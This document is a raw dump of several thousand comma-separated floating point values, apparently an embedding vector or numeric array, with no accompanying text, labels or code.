-0.028506262227892876, 0.009982530027627945, -0.007159929256886244, 0.0021019363775849342, -0.015627730637788773, -0.02917354367673397, -0.00470099737867713, 0.027411919087171555, 0.010122658684849739, 0.008427764289081097, 0.0147335734218359, -0.0094153406098485, 0.004647614900022745, 0.013152115978300571, 0.032750170677900314, 0.0010092630982398987, 0.006852979771792889, 0.008614602498710155, -0.03870232030749321, 0.009001625701785088, 0.006482638884335756, -0.012871858663856983, -0.002921024337410927, -0.012518199160695076, 0.003786821849644184, -0.0063925557769834995, 0.006926381029188633, 0.006429256405681372, -0.0015847933245822787, -0.018296856433153152, 0.0007331754313781857, 0.02382194623351097, 0.014987139962613583, -0.00017516137450002134, -0.0045174951665103436, -0.00699978182092309, -0.016655344516038895, 0.01849704049527645, -0.001238641096279025, 0.004847799427807331, -0.012798457406461239, -0.004097107797861099, -0.0106031009927392, 0.037901584059000015, 0.051540814340114594, -0.003311384003609419, 0.010763249360024929, -0.00043123061186634004, 0.018924100324511528, -0.010970106348395348, 0.013252208940684795, -0.022060323506593704, 0.007266694214195013, 0.020819179713726044, -0.00628245435655117, 0.006452611181885004, -0.02410220354795456, 0.01524070743471384, -0.028426187112927437, 0.008561220020055771, -0.0454552099108696, 0.010142677463591099, -0.02003178745508194, -0.01460011675953865, -0.000665613217279315, 0.00496457377448678, -0.019631419330835342, 0.00762035371735692, -0.006215726025402546, 0.045054841786623, 0.024849560111761093, 0.00929522980004549, -0.0017482772236689925, -0.007933976128697395, -0.001141051179729402, -0.0031879369635134935, -0.000004743953923025401, -0.0099091287702322, 0.012297996319830418, -0.005148075986653566, -0.003206287045031786, -0.0106364656239748, -0.002462268341332674, 0.00860793050378561, -0.006499320734292269, 0.011670751497149467, -0.01062311977148056, -0.00012636641622520983, 0.005715265404433012, 0.02941376343369484, 0.024555955082178116, 0.0066628046333789825, -0.005615172907710075, -0.015547656454145908, -0.0038635593373328447, -0.030374649912118912, 0.02151315286755562, -0.029600603505969048, -0.02247403748333454, 0.011123580858111382, -0.0038368680980056524, -0.0018767289584502578, 0.009635543450713158, -0.01328557264059782, -0.020218625664711, 0.018443657085299492, 0.0004379034216981381, 0.011997719295322895, -0.015200669877231121, 0.0023188027553260326, 0.015614384785294533, -0.0018583786441013217, -0.00008179410360753536, -0.00015900064317975193, -0.0026507752481848, 0.00002343304549867753, -0.014813646674156189, 0.015721149742603302, -0.022006940096616745, 0.007793846540153027, 0.03830195218324661, 0.019284432753920555, -0.00399367930367589, 0.015254052355885506, 0.032590024173259735, -0.005091357044875622, -0.029814133420586586, -0.0214731153100729, 0.004047061782330275, 0.029013395309448242, 0.01410632859915495, 0.024782830849289894, 0.007700427435338497, -0.026050666347146034, 0.0029877524357289076, 0.001613152795471251, -0.01720251515507698, -0.02783898077905178, 0.005481716711074114, 0.03365767374634743, -0.008240925148129463, 0.02941376343369484, -0.009115063585340977, 0.017709648236632347, -0.013125425204634666, 0.008627948351204395, 0.009361958131194115, -0.027318499982357025, -0.010369553230702877, 0.02251407504081726, -0.003519909456372261, 0.003436499275267124, 0.011403839103877544, -0.033897895365953445, 0.013005314394831657, -0.007693754509091377, 0.019177667796611786, -0.010943414643406868, -0.003314720466732979, 0.01750946417450905, 0.02535669319331646, 0.023087935522198677, -0.020912598818540573, -0.016802145168185234, 0.011910973116755486, 0.01720251515507698, -0.008120814338326454, 0.020712414756417274, 0.016802145168185234, -0.014399932697415352, -0.009195137768983841, -0.013946181163191795, 0.0125849274918437, 0.02378190867602825, 0.004650951363146305, -0.01062979269772768, 0.002624084008857608, -0.0026207477785646915, 0.030347958207130432, -0.006699505262076855, -0.002954388502985239, 0.013479084707796574, -0.020325390622019768, -0.010583083145320415, -0.0021369687747210264, 0.021833447739481926, -0.014933757483959198, 0.006599413231015205, -0.020685723051428795, 0.020632341504096985, 0.002075245138257742, 0.009442031383514404, 0.00869467668235302, 0.016281666234135628, 0.0051847766153514385, 0.0022620840463787317, 0.0008924888679757714, 0.0027675495948642492, 0.04767058417201042, 0.006872998550534248, -0.005017956253141165, -0.004437421448528767, 0.005812020972371101, 0.0011143599404022098, 0.00628912728279829, 0.007046491373330355, -0.01257158163934946, -0.0011235350975766778, 0.009835727512836456, -0.032696787267923355, -0.007119892630726099, -0.008921552449464798, -0.009535451419651508, -0.014573425985872746, 0.014306513592600822, -0.016628652811050415, -0.011016815900802612, -0.010890032164752483, -0.002080249832943082, 0.012911895290017128, -0.01594802550971508, 0.010289479047060013, -0.016935601830482483, -0.003676720429211855, -0.011850917711853981, 0.0038535501807928085, -0.02007182501256466, 0.006495984271168709, 0.014760264195501804, -0.004440757911652327, -0.024489227682352066, -0.014399932697415352, -0.010349534451961517, 0.007747136987745762, -0.017843104898929596, 0.008841478265821934, -0.015787877142429352, -0.005525089800357819, 0.01877729780972004, 0.008200888521969318, 0.02121954783797264, 0.007566971238702536, -0.004680979065597057, -0.016201592981815338, 0.019311124458909035, -0.0022387290373444557, -0.0011035166680812836, -0.014239785261452198, 0.022847715765237808, -0.005888758227229118, -0.01729593425989151, 0.015534310601651669, 0.0308550912886858, -0.011750825680792332, -0.007820538245141506, -0.021633263677358627, -0.00046042416943237185, -0.01584126055240631, 0.014159711077809334, 0.0011585673782974482, 0.0027091624215245247, -0.020365428179502487, 0.012384742498397827, -0.018350237980484962, -0.010883359238505363, -0.011183636263012886, 0.0017349316040053964, 0.0012978622689843178, 0.024622684344649315, -0.002193687716498971, -0.013038678094744682, 0.005124721210449934, -0.007533607073128223, 0.01144387573003769, -0.012951931916177273, 0.01064981147646904, -0.009195137768983841, 0.013719305396080017, -0.008467800915241241, 0.0023972084745764732, 0.01744273491203785, 0.004507485777139664, 0.027305154129862785, 0.010976779274642467, 0.027598759159445763, 0.024555955082178116, 0.01534747239202261, -0.018977483734488487, -0.004063743632286787, -0.0002625335182528943, 0.008521183393895626, -0.002252074657008052, 0.0009216824546456337, 0.00044749557855539024, -0.0008153344388119876, -0.005398306529968977, 0.006335836835205555, -0.007593662478029728, 0.017856450751423836, -0.016415122896432877, -0.011116907931864262, 0.0020151897333562374, 0.017642920836806297, 0.024969669058918953, 0.0007231662166304886, -0.019644765183329582, -0.019351160153746605, -0.004754379857331514, 0.026424342766404152, 0.012191231362521648, 0.008354363031685352, -0.011023488827049732, -0.011143599636852741, 0.005641864147037268, 0.020472193136811256, 0.004630933050066233, -0.007566971238702536, 0.0011485581053420901, 0.011196982115507126, 0.027251772582530975, 0.001321217161603272, -0.0023271439131349325, -0.008821460418403149, 0.01270503830164671, -0.0054583619348704815, -0.0076537178829312325, 0.01187093649059534, -0.005221476778388023, 0.007273367140442133, -0.018083326518535614, 0.0011310420231893659, -0.0009008299093693495, 0.003519909456372261, 0.006732869427651167, 0.00495790084823966, 0.012825148180127144, -0.02017858996987343, 0.024409154430031776, 0.01868387870490551, -0.004310637712478638, -0.00638588285073638, -0.01584126055240631, -0.014880375005304813, 0.010336188599467278, -0.011717461049556732, -0.015307435765862465, -0.011170290410518646, 0.02643768861889839, -0.0012911894591525197, -0.006802933756262064, 0.023087935522198677, -0.018163399770855904, 0.016788799315690994, 0.013032006099820137, 0.003676720429211855, -0.007793846540153027, 0.002564028836786747, -0.005591818131506443, 0.013152115978300571, 0.009942492470145226, 0.0018483694875612855, 0.0031829322688281536, 0.008394399657845497, -0.027545375749468803, 0.01399956364184618, -0.008761405013501644, -0.0026290887035429478, -0.003127881558611989, 0.009708944708108902, -0.0046743061393499374, -0.02378190867602825, -0.0041237990371882915, 0.012631637044250965, -0.030267884954810143, -0.01000254787504673, 0.03859555721282959, -0.036406874656677246, -0.004020370543003082, 0.0016014754073694348, 0.009462050162255764, -0.03218965604901314, 0.005561790429055691, -0.016668688505887985, -0.006582730915397406, -0.0099091287702322, -0.0092151565477252, -0.02240731008350849, 0.012531545013189316, 0.003856886411085725, 0.009849073365330696, -0.008194215595722198, -0.025770407170057297, -0.015053868293762207, -0.0012052770471200347, 0.0212062019854784, -0.004741034470498562, -0.014493351802229881, 0.010256115347146988, 0.011804208159446716, -0.0036233379505574703, -0.011397166177630424, 0.007380132097750902, 0.014186402782797813, 0.001973484642803669, 0.001990166725590825, -0.0042472463101148605, -0.022273853421211243, -0.03440503031015396, 0.006225735414773226, -0.001708240364678204, 0.01065648440271616, -0.00809412356466055, 0.016962293535470963, 0.0014129683841019869, 0.001718249637633562, -0.027091624215245247, 0.022273853421211243, 0.005001273937523365, 0.012811803258955479, 0.005091357044875622, 0.024422498419880867, 0.02144642360508442, 0.0028943330980837345, 0.03309715911746025, 0.007119892630726099, -0.004931209608912468, 0.005588481668382883, -0.008994953706860542, 0.0001249067427124828, -0.004887836053967476, -0.0200851708650589, 0.01187093649059534, -0.004390711430460215, 0.005855394061654806, 0.03691400587558746, 0.003680056892335415, 0.002005180576816201, -0.001701567554846406, -0.0005984680028632283, 0.013552485033869743, -0.00638254638761282, -0.0019568027928471565, 0.005515080876648426, 0.008621275424957275, -0.0020485538989305496, -0.0050613293424248695, 0.0015339130768552423, -0.00736011378467083, 0.014680190943181515, 0.013812725432217121, -0.017042366787791252, -0.006505993660539389, 0.018990827724337578, -0.005178103689104319, -0.010182714089751244, 0.009041663259267807, -0.013252208940684795, 0.004577550571411848, -0.009255193173885345, 0.019698146730661392, -0.0052648503333330154, 0.005828702822327614, -0.016481850296258926, 0.010589756071567535, 0.0012503184843808413, -0.0011552309151738882, -0.02657114528119564, -0.007139910943806171, 0.0010159359080716968, 0.020312046632170677, 0.005424997769296169, -0.027598759159445763, 0.005024628713726997, -0.018323548138141632, 0.0023288121446967125, 0.0031629137229174376, -0.004290619399398565, -0.004857808817178011, 0.024555955082178116, 0.003873568493872881, 0.025663642212748528, 0.0007915625465102494, -0.015547656454145908, -0.029814133420586586, 0.007226657588034868, 0.020218625664711, -0.009829054586589336, -0.016948947682976723, 0.013545812107622623, 0.00530822342261672, 0.0021436414681375027, 0.017763031646609306, 0.008994953706860542, -0.0133122643455863, -0.002745863050222397, -0.02015189826488495, 0.005448352545499802, -0.005171430762857199, 0.026010628789663315, -0.013432374224066734, -0.008861497044563293, -0.005505071487277746, -0.014800301752984524, 0.012111157178878784, 0.0032463239040225744, -0.005952150095254183, 0.024489227682352066, 0.0173760075122118, -0.013512448407709599, -0.005968831945210695, -0.0006960579194128513, 0.022167088463902473, 0.005538435652852058, -0.02802581898868084, -0.005521753802895546, -0.02678467519581318, -0.009368631057441235, 0.0076003349386155605, 0.013852762058377266, 0.032696787267923355, 0.01624162867665291, -0.0025156508199870586, -0.000021204430595389567, 0.015200669877231121, -0.0034932182170450687, -0.017909832298755646, -0.0039002597332000732, 0.01257825456559658, 0.007546952459961176, 0.007927303202450275, 0.02132631279528141, -0.008207561448216438, -0.01265832781791687, 0.0038235224783420563, -0.011557313613593578, 0.022006940096616745, -0.011604023166000843, 0.010910050943493843, -0.012438124977052212, 0.009875765070319176, -0.0029877524357289076, 0.022073669359087944, 0.02783898077905178, 0.0006013873498886824, 0.00003120061955996789, -0.011730806902050972, 0.011377147398889065, -0.0045942324213683605, -0.0004429080290719867, 0.005478380247950554, 0.04134475439786911, -0.013212171383202076, 0.02112612873315811, 0.01992502249777317, -0.01000922080129385, -0.001976821105927229, -0.019217703491449356, 0.0007035648450255394, 0.007793846540153027, 0.004627596586942673, 0.0076470449566841125, 0.0017733003478497267, 0.0037334393709897995, 0.004374029580503702, 0.035099003463983536, -0.01709575019776821, 0.011203655041754246, -0.01991167664527893, 0.00397366052493453, -0.01533412653952837, 0.003339743474498391, -0.0006485141348093748, 0.006832961458712816, 0.007907284423708916, 0.01617490127682686, 0.01581456884741783, 0.00629246374592185, -0.002378858160227537, -0.0076537178829312325, -0.008641294203698635, 0.00700645474717021, 0.01713578589260578, 0.009748981334269047, 0.012031083926558495, -0.010449626483023167, 0.004724352154880762, 0.012124503031373024, -0.016988985240459442, -0.0015806228620931506, -0.017843104898929596, -0.006539357826113701, 0.015387509018182755, 0.008741386234760284, 0.0022170424927026033, -0.0000048058595893962774, 0.016281666234135628, 0.00860125757753849, -0.0092151565477252, -0.005465034861117601, 0.0056552099995315075, -0.014199748635292053, -0.008194215595722198, -0.0013720974093303084, -0.006485975347459316, -0.010476318188011646, -0.0008841478265821934, 0.0022137060295790434, -0.01461346261203289, 0.0024939642753452063, -0.009361958131194115, 0.014079637825489044, 0.0008220072486437857, -0.009835727512836456, -0.02240731008350849, -0.004170508589595556, -0.02239396423101425, -0.007767155300825834, 0.003341411706060171, -0.02016524411737919, -0.006459284108132124, -0.007633699104189873, -0.010442953556776047, -0.006335836835205555, -0.0011802539229393005, 0.010262788273394108, -0.006192371249198914, 0.0017649593064561486, 0.008814787492156029, -0.01062311977148056, -0.03189605101943016, -0.013185480609536171, 0.0002366763656027615, -0.007053164299577475, 0.0022587475832551718, 0.007860574871301651, 0.006489311810582876, -0.006532684899866581, -0.03363098204135895, 0.008407745510339737, -0.0029760750476270914, -0.003041134914383292, -0.0037401122972369194, 0.013512448407709599, 0.018150053918361664, -0.02123289369046688, 0.0007390141254290938, -0.019444579258561134, 0.002937706420198083, 0.01888406276702881, -0.006242417264729738, 0.00806075893342495, -0.02259414829313755, -0.02541007660329342, -0.0022420655004680157, -0.0013045350788161159, -0.013072042725980282, -0.02000509575009346, 0.005204794928431511, -0.000044859036279376596, -0.003096185624599457, 0.0025106463581323624, -0.0032846927642822266, -0.023101281374692917, 0.021619917824864388, -0.0173760075122118, -0.01580122299492359, -0.025049744173884392, 0.015173979103565216, 0.002090258989483118, -0.011063525453209877, -0.007073182612657547, 0.006953072268515825, -0.022127050906419754, -0.007099874317646027, 0.006772906053811312, 0.015601038932800293, -0.0011769175762310624, -0.014466661028563976, -0.029814133420586586, -0.008507837541401386, 0.004260591696947813, 0.015547656454145908, 0.013745997101068497, 0.009748981334269047, 0.018937446177005768, -0.010169368237257004, 0.0029860842041671276, -0.005591818131506443, -0.014520043507218361, 0.016815491020679474, 0.012157866731286049, 0.0003665877156890929, 0.02280767820775509, 0.007627026177942753, -0.0025173190515488386, -0.023474959656596184, -0.006846307311207056, 0.0004904518136754632, -0.0018483694875612855, -0.012538217939436436, -0.011917646043002605, -0.00663277693092823, 0.044654469937086105, -0.016628652811050415, -0.022140396758913994, 0.014493351802229881, -0.005738620180636644, 0.004647614900022745, 0.016214938834309578, 0.007533607073128223, 0.0009850742062553763, -0.009255193173885345, 0.004270601086318493, -0.0009959174785763025, 0.007073182612657547, -0.0014938762178644538, -0.01134378369897604, -0.012524872086942196, 0.011190309189260006, -0.005221476778388023, 0.032776862382888794, 0.010849995538592339, -0.020632341504096985, 0.0023054571356624365, 0.01869722455739975, -0.02003178745508194, -0.017763031646609306, -0.013479084707796574, -0.0034298263490200043, -0.0060021961107850075, -0.0003857720585074276, -0.023701835423707962, -0.006886343937367201, 0.003790158312767744, 0.013539139181375504, -0.004270601086318493, -0.004387375432997942, -0.010796613059937954, 0.013325609266757965, -0.013799379579722881, 0.0016006412915885448, 0.00150555360596627, -0.03288362920284271, 0.002547346753999591, 0.006412574090063572, 0.00030736648477613926, 0.010669829323887825, -0.01980491168797016, -0.011417184956371784, 0.0006760394899174571, 0.010930069722235203, -0.0037701399996876717, -0.004847799427807331, -0.005905440542846918, -0.008888187818229198, 0.003856886411085725, -0.020859217271208763, 0.009068354032933712, 0.01195768266916275, -0.0036600385792553425, 0.014933757483959198, -0.00567189184948802, 0.005521753802895546, -0.020485538989305496, -0.0057286107912659645, 0.011463894508779049, 0.005521753802895546, -0.005214804317802191, -0.030908474698662758, 0.0026207477785646915, 0.013565830886363983, -0.003483208827674389, -0.017069058492779732, 0.005281532183289528, 0.00066603027516976, -0.014399932697415352, -0.020979328081011772, 0.008901533670723438, -0.012364724650979042, -0.01853707805275917, -0.009735635481774807, -0.0029894206672906876, -0.006699505262076855, 0.0006993943243287504, -0.0027041579596698284, -0.013072042725980282, 0.0033347387798130512, -0.022380618378520012, 0.024275697767734528, -0.006379210390150547, -0.012991968542337418, -0.0018100007437169552, -0.00796733982861042, -0.009168446063995361, 0.02124623954296112, 0.018937446177005768, 0.0022237151861190796, -0.0024372453335672617, 0.0028042499907314777, -0.0011802539229393005, 0.01409298274666071, -0.008614602498710155, 0.0154275456443429, -0.00012563657946884632, -0.003966988064348698, 0.0035766283981502056, -0.011176963336765766, -0.006359191611409187, 0.008054086938500404, -0.027652140706777573, -0.008961589075624943, -0.017989907413721085, -0.0038001674693077803, -0.02789236232638359, 0.0025239919777959585, -0.009048336185514927, -0.002552351448684931, 0.012111157178878784, -0.003403135109692812, -0.023127973079681396, -0.0035599463153630495, -0.013812725432217121, 0.0003895255213137716, -0.0005926293088123202, 0.010856668464839458, 0.030134428292512894, -0.013705959543585777, 0.00788726657629013, 0.002952720271423459, -0.015601038932800293, -0.005812020972371101, -0.005364942364394665, -0.024502573534846306, -0.00021040216961409897, -0.003121208632364869, 0.00992914754897356, 0.002774222521111369, 0.0023588398471474648, -0.002091927221044898, 0.03152237460017204, -0.016495196148753166, -0.009555469267070293, -0.007273367140442133, 0.030187809839844704, 0.01726924255490303, -0.001512226415798068, -0.0048644812777638435, -0.01748277246952057, 0.005688573699444532, -0.01338566467165947, -0.014319858513772488, -0.016388431191444397, 0.0017165814060717821, 0.007900611497461796, -0.023314811289310455, -0.016481850296258926, 0.0002366763656027615, 0.02677132934331894, 0.023434922099113464, 0.017909832298755646, 0.0029694021213799715, 0.02394205704331398, -0.0075269341468811035, -0.009582160972058773, -0.006522675510495901, -0.023541687056422234, 0.019191013649106026, 0.008441110141575336, -0.00928855687379837, -0.01124369166791439, 0.031442299485206604, -0.007733791600912809, 0.013345628045499325, -0.019724838435649872, 0.0032596695236861706, 0.006926381029188633, 0.02416893281042576, 0.019324468448758125, -0.010402916930615902, 0.0024989687371999025, 0.02386198192834854, -0.0028943330980837345, 0.009095045737922192, -0.002742526587098837, 0.0067428783513605595, 0.013572503812611103, -0.020565612241625786, -0.010336188599467278, 0.006012205500155687, 0.01402625534683466, 0.007233330514281988, 0.011423857882618904, -0.009008298628032207, -0.010169368237257004, -0.025917209684848785, -0.008040741086006165, 0.0041304719634354115, -0.020218625664711, 0.004844462964683771, -0.001513060531578958, 0.014439969323575497, -0.008134160190820694, -0.012351378798484802, 0.017122440040111542, 0.011537295766174793, -0.011110235005617142, -0.01470688171684742, -0.008954916149377823, -0.0017532819183543324, -0.009335266426205635, 0.028746481984853745, -0.004644278436899185, -0.014520043507218361, 0.007460205815732479, -0.0018250145949423313, -0.004460776224732399, 0.004303965251892805, -0.026130739599466324, 0.0198182575404644, -0.011817554011940956, -0.013445720076560974, 0.01614820957183838, 0.01399956364184618, 0.021980248391628265, -0.013258881866931915, 0.01208446640521288, -0.009949165396392345, -0.004574214108288288, -0.03325730562210083, -0.032616715878248215, 0.02404882200062275, 0.011423857882618904, 0.005178103689104319, -0.005111375357955694, 0.003509900067001581, -0.024182278662919998, -0.005968831945210695, 0.009442031383514404, -0.0265577994287014, 0.012604945339262486, -0.007340095471590757, 0.00019945457461290061, -0.006796260830014944, 0.004981255624443293, 0.014760264195501804, -0.02140638791024685, 0.005751965567469597, 0.00011594014358706772, -0.016468504443764687, -0.01402625534683466, -0.0013470742851495743, 0.013325609266757965, -0.00044040571083314717, -0.0062724449671804905, -0.012137848883867264, 0.01257825456559658, 0.004894508980214596, -0.000017620399376028217, 0.0009700603550300002, 0.004237236920744181, -0.0014571757055819035, 0.0008320165215991437, -0.00663944985717535, -0.002355503384023905, -0.012958604842424393, 0.007566971238702536, -0.0036200014874339104, -0.001993503188714385, 0.0005154748796485364, -0.01255823578685522, 0.0008582907030358911, -0.014293167740106583, -0.001888406346552074, -0.0001748485810821876, -0.016468504443764687, -0.006082269828766584, -0.018323548138141632, -0.002624084008857608, -0.007113219704478979, 0.01276509277522564, -0.0034465084318071604, 0.01867053285241127, 0.0038201860152184963, -0.0185637678951025, 0.0035499371588230133, -0.01339901052415371, 0.02554353140294552, -0.009101718664169312, 0.005171430762857199, -0.008120814338326454, 0.0079606669023633, -0.004984592087566853, -0.001798323355615139, -0.002562360605224967, 0.003051144303753972, 0.00010389780072728172, -0.003324729623273015, -0.0016231619520112872, -0.005421661306172609, 0.01590798795223236, 0.021713336929678917, 0.015454237349331379, 0.012264631688594818, 0.006095615681260824, 0.022300545126199722, -0.02283436991274357, 0.015654422342777252, -0.014893720857799053, -0.0025356693658977747, 0.02687809430062771, 0.0012695029145106673, -0.008661312982439995, 0.014186402782797813, 0.004570877645164728, 0.0024289044085890055, 0.0015472586965188384, 0.03899592533707619, 0.009722289629280567, -0.017709648236632347, 0.001221959013491869, 0.0026841394137591124, 0.013325609266757965, 0.004660960752516985, -0.011877608485519886, -0.019257741048932076, 0.0028976695612072945, 0.00435067480430007, 0.012798457406461239, -0.012378069572150707, 0.012364724650979042, -0.015214015729725361, -0.013212171383202076, 0.01864384301006794, 0.018870718777179718, -0.019030865281820297, 0.008127487264573574, 0.0022137060295790434, 0.033977970480918884, -0.018256818875670433, 0.0007803021580912173, -0.01061644684523344, -0.020765796303749084, 0.0013053691945970058, 0.011550640687346458, -0.005501735024154186, -0.010309497825801373, -0.006242417264729738, 0.008014049381017685, 0.0133122643455863, -0.003920278046280146, -0.017042366787791252, 0.010362880304455757, -0.0046743061393499374, -0.0030094392132014036, 0.024235660210251808, -0.00866798497736454, 0.02011186070740223, 0.005274859257042408, 0.0005959657137282193, 0.021046055480837822, 0.0020302035845816135, 0.007440187502652407, 0.01975153014063835, 0.006532684899866581, 0.00932192150503397, -0.006729532964527607, -0.0159213338047266, -0.00505799287930131, 0.016561923548579216, 0.016882220283150673, 0.016214938834309578, -0.015614384785294533, -0.011090217158198357, 0.013579176738858223, 0.0012519867159426212, -0.019057556986808777, -0.0024205632507801056, 0.03360429033637047, 0.021780064329504967, 0.028479570522904396, -0.014173056930303574, -0.008934898301959038, -0.008821460418403149, 0.01196435559540987, -0.005508407950401306, -0.02017858996987343, 0.006325827445834875, -0.02145976945757866, 0.014466661028563976, -0.008214234374463558, 0.019177667796611786, -0.017616229131817818, 0.008461127988994122, -0.00021707497944589704, 0.011724133975803852, -0.013178807683289051, 0.00638588285073638, -0.010189387015998363, -0.002076913369819522, 0.01337231881916523, 0.004434084985405207, -0.01868387870490551, -0.01002923958003521, -0.035365913063287735, 0.00040996100869961083, 0.004107117187231779, -0.009755654260516167, -0.03315053880214691, 0.0304547231644392, -0.006752887740731239, 0.009648889303207397, -0.019658109173178673, 0.003793494775891304, 0.014560080133378506, -0.0319761261343956, -0.024502573534846306, -0.008941570296883583, 0.01195100974291563, -0.01125703752040863, -0.019658109173178673, -0.006068924441933632, -0.000237301952438429, -0.01589464209973812, 0.014173056930303574, -0.007173275109380484, 0.01003591250628233, 0.014066291972994804, -0.012551562860608101, -0.015147287398576736, 0.0024222314823418856, -0.02133965864777565, 0.004273937549442053, -0.0319761261343956, -0.01983160339295864, -0.013719305396080017, 0.043373290449380875, 0.0017432726453989744, -0.006799597293138504, -0.03579297289252281, -0.027358537539839745, 0.007233330514281988, -0.025810444727540016, -0.000756947323679924, -0.0012970282696187496, 0.012017738074064255, 0.00470433384180069, 0.000668532564304769, 0.016908910125494003, 0.0010167700238525867, 0.00798068568110466, 0.0044741216115653515, 0.02786567062139511, 0.019618073478341103, -0.004107117187231779, 0.002528996439650655, 0.012157866731286049, -0.011016815900802612, 0.00664945924654603, 0.020405465736985207, -0.010369553230702877, -0.00007637243834324181, -0.02520989067852497, 0.0030010980553925037, 0.011577332392334938, -0.0009575487929396331, -0.008247598074376583, -0.0037367758341133595, -0.03744783252477646, 0.007640372030436993, 0.013205498456954956, 0.005511744413524866, 0.022981170564889908, 0.009735635481774807, -0.004584223031997681, -0.03485878184437752, 0.012711710296571255, 0.0002902674023061991, 0.031148696318268776, 0.0023188027553260326, -0.013605867512524128, 0.0025056416634470224, 0.009555469267070293, -0.007266694214195013, -0.00038285271148197353, -0.021980248391628265, 0.040891002863645554, -0.022967826575040817, 0.02553018555045128, -0.016895564272999763, -0.003132886253297329, -0.0063224914483726025, 0.010509681887924671, -0.016468504443764687, 0.004554195329546928, -0.003024452831596136, -0.03432495519518852, 0.013532467186450958, -0.01999174989759922, 0.008534529246389866, 0.003513236530125141, -0.008934898301959038, 0.0004374863638076931, -0.004207209218293428, -0.0008149173809215426, 0.02244734577834606, 0.021019363775849342, -0.024249006062746048, -0.0032596695236861706, -0.004807762335985899, -0.020819179713726044, 0.019377851858735085, 0.0018283510580658913, -0.0014863692922517657, -0.003231310285627842, -0.018256818875670433, 0.013946181163191795, -0.009235174395143986, 0.009595506824553013, -0.000056197604862973094, -0.0032680106814950705, 0.0066661410965025425, 0.016375085338950157, 0.009061681106686592, -0.012338032945990562, -0.005571799818426371, 0.002929365262389183, 0.0009325257269665599, -0.0022120377980172634, 0.009001625701785088, -0.005621845833957195, -0.004677642602473497, 0.012731729075312614, -0.025930555537343025, -0.01524070743471384, 0.006232408341020346, -0.0061189704574644566, -0.010409589856863022, -0.0147335734218359, -0.023528343066573143, 0.010776594281196594, 0.02278098650276661, -0.03352421894669533, -0.001312876120209694, 0.027238426730036736, 0.006259099580347538, 0.012438124977052212, 0.013852762058377266, -0.012451470829546452, 0.00150805595330894, -0.0020185261964797974, -0.00283094123005867, 0.01584126055240631, 0.020712414756417274, -0.0031779275741428137, -0.01614820957183838, -0.009348612278699875, 0.012791784480214119, -0.017602883279323578, -0.002450590953230858, 0.012331360019743443, 0.00012428115587681532, -0.004797753412276506, 0.02645103447139263, 0.0076136807911098, -0.004460776224732399, 0.010369553230702877, -0.016762109473347664, 0.005011283326894045, -0.006229071877896786, 0.02117951214313507, 0.0042038727551698685, 0.016735417768359184, -0.022353926673531532, 0.009368631057441235, -0.01577453315258026, -0.010276133194565773, 0.0033430797047913074, 0.013032006099820137, -0.01997840590775013, 0.011196982115507126, -0.007466878741979599, 0.018390275537967682, 0.0018250145949423313, -0.03731437772512436, 0.007213311735540628, 0.013045351020991802, 0.002919356105849147, 0.014546734280884266, -0.0006989772664383054, 0.00736011378467083, 0.012491507455706596, -0.0014980467967689037, 0.00007767572242300957, 0.0054616983979940414, 0.008881515823304653, 0.001518899342045188, 0.014253131113946438, -0.016842182725667953, -0.0072600217536091805, -0.030294574797153473, 0.003796831239014864, -0.013645905070006847, -0.0063158185221254826, 0.0037434487603604794, 0.01255823578685522, -0.006155671086162329, 0.01853707805275917, 0.0035466006956994534, 0.010816631838679314, 0.013432374224066734, 0.023194702342152596, -0.010863341391086578, 0.002178673865273595, 0.017869796603918076, -0.016575269401073456, 0.019497962668538094, 0.0034731996711343527, -0.004297292325645685, -0.014480005949735641, -0.03349752724170685, -0.009508759714663029, -0.008868169970810413, -0.005441679619252682, -0.028773173689842224, -0.0030744990799576044, -0.004480794537812471, -0.00003435456528677605, 0.02773221582174301, 0.013452393002808094, 0.013599194586277008, 0.004424075596034527, -0.014199748635292053, 0.010249442420899868, 0.0011902631958946586, 0.0006785417790524662, 0.00024293213209602982, -0.004460776224732399, -0.019271086901426315, 0.027598759159445763, 0.021926866844296455, -0.0005847053253091872, -0.005361605901271105, 0.030961856245994568, 0.0008924888679757714, -0.0020218626596033573, -0.015053868293762207, 0.00567522831261158, -0.018283510580658913, -0.014333204366266727, 0.012424780055880547, -0.0031595774926245213, -0.012751747854053974, 0.02387532778084278, 0.018190091475844383, -0.025757061317563057, -0.010236096568405628, -0.02938707359135151, 0.0019184340490028262, -0.00381017685867846, -0.00028839067090302706, -0.009702271781861782, 0.012991968542337418, -0.00866798497736454, -0.001608982332982123, -0.01614820957183838, 0.005374951753765345, 0.00530822342261672, -0.0019384524784982204, 0.007433514576405287, 0.009168446063995361, 0.015267398208379745, 0.0010926732793450356, -0.009188464842736721, 0.011750825680792332, 0.01390614453703165, -0.0026841394137591124, -0.02124623954296112, -0.011517276987433434, -0.008361035957932472, -0.0010643138084560633, 0.0037467849906533957, 0.0101093128323555, 0.014159711077809334, 0.026330923661589622, 0.008474473841488361, -0.005558453965932131, 0.02944045513868332, -0.0010734889656305313, 0.005785329733043909, 0.006068924441933632, -0.012785111553966999, 0.0007465210510417819, -0.002757540438324213, 0.009748981334269047, -0.0225274208933115, 0.021966904401779175, 0.01888406276702881, -0.011837571859359741, 0.017069058492779732, 0.03891585022211075, 0.014146365225315094, 0.005151412449777126, 0.02400878444314003, -0.01000922080129385, 0.021579880267381668, 0.01062979269772768, 0.004527504090219736, -0.0005746961105614901, -0.0074068233370780945, -0.011450548656284809, -0.01000922080129385, 0.0023054571356624365, -0.00495122792199254, -0.0028793192468583584, 0.01741604506969452, -0.0025857153814285994, -0.01339233759790659, -0.01744273491203785, -0.0071332380175590515, 0.010803285986185074, 0.02143307775259018, -0.011597351171076298, -0.0027091624215245247, 0.009795690886676311, 0.0400368832051754, 0.006352519150823355, -0.006182362325489521, 0.014973795041441917, 0.007099874317646027, -0.004620923660695553, -0.017989907413721085, -0.01993836835026741, 0.035259149968624115, -0.00638254638761282, -0.00319460965692997, -0.040410563349723816, 0.0027642131317406893, -0.012031083926558495, -0.007840556092560291, 0.008647967129945755, -0.00806743185967207, -0.006966417655348778, 0.0035899740178138018, 0.010976779274642467, 0.024582646787166595, -0.016708726063370705, -0.015307435765862465, 0.012604945339262486, -0.006959745194762945, 0.0026207477785646915, 0.03074832633137703, -0.025743717327713966, 0.0014421619707718492, -0.0030728308483958244, -0.017856450751423836, -0.02140638791024685, -0.007446860428899527, -0.00859458465129137, 0.0079606669023633, -0.019591381773352623, -0.00809412356466055, -0.001055138767696917, 0.00858123879879713, 0.010556391440331936, 0.006672814022749662, -0.021793410181999207, -0.006893016863614321, -0.0185637678951025, 0.004243909846991301, 0.007073182612657547, -0.0036400200333446264, -0.004047061782330275, 